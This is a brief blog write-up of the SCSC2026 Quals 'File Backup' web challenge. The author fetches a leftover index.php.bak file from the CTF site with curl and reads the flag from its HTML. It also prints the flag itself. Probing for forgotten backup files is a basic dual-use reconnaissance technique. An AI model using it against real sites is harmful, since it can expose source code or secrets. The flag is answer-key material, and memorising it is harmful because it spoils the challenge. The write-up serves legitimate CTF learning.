64 words
1 minutes
SCSC2026 Quals - File Backup - Web Exploitation Writeup
Category: Web Exploitation
URL: https://ctf.sriwijayasecuritysociety.com/
Flag: SCSC26{4h_1_f0rg3t_to_d3letE}
Challenge Description
backup my index pls
Analysis
Because there was no URL given for the challenge instance, I initially thought the target was the CTFd site itself. The hint “backup my index” strongly suggests a leftover backup file such as .bak, .old, or .swp.
Exploitation
Access the backup file directly:
curl https://ctf.sriwijayasecuritysociety.com/index.php.bakThe response contained the flag directly inside the HTML:
<main role="main">
<div class="container">
<p>SCSC26{4h_1_f0rg3t_to_d3letE}</p>
</div>
</main> SCSC2026 Quals - File Backup - Web Exploitation Writeup
https://blog.rei.my.id/posts/22/scsc2026-quals-file-backup-web-exploitation-writeup/